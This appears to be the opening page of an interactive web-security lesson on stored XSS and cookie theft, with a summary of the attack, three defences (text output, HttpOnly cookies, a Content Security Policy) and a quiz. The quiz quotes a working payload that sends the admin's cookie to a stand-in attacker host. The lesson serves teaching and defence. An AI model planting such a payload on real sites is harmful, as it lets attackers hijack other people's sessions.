01step · watch first
A primer on the comment that runs.
A short walkthrough of stored XSS — how an ordinary blog comment turns into a script running in the admin's browser, how that browser hands you the admin's login pass, and the three separate fixes that would each have stopped it. Watch it through, then move on to the animated walkthrough.
▶
Lesson · Stored XSS & cookie theft
~8 min
≡
Summary
what to remember
- 1Some pages show your comment. Some pages obey it. A blog that treats your text as real HTML is a stage — and any visitor can write the next scene.
- 2A comment that runs isn't a comment — it's a trap. The root cause: the site showed your input as code instead of as text, and saved it exactly as you wrote it.
- 3An admin keeps checking this blog. An automated browser opens new comments every 30 seconds, carrying the real admin login pass.
- 4The script runs as if it were the admin — so it can read the login cookie with
document.cookieand send it to you withfetch(). - 5Defence in layers. Show input as text, mark cookies
HttpOnly, add a Content Security Policy. Any one of the three would have stopped you.
?
Quick check · before you continue
1 question · pick one
QA blog shows comments as real HTML instead of plain text. You post <script>fetch('//attacker?c='+document.cookie)</script>, and an automated admin browser opens the comment. Where does the admin's login cookie end up?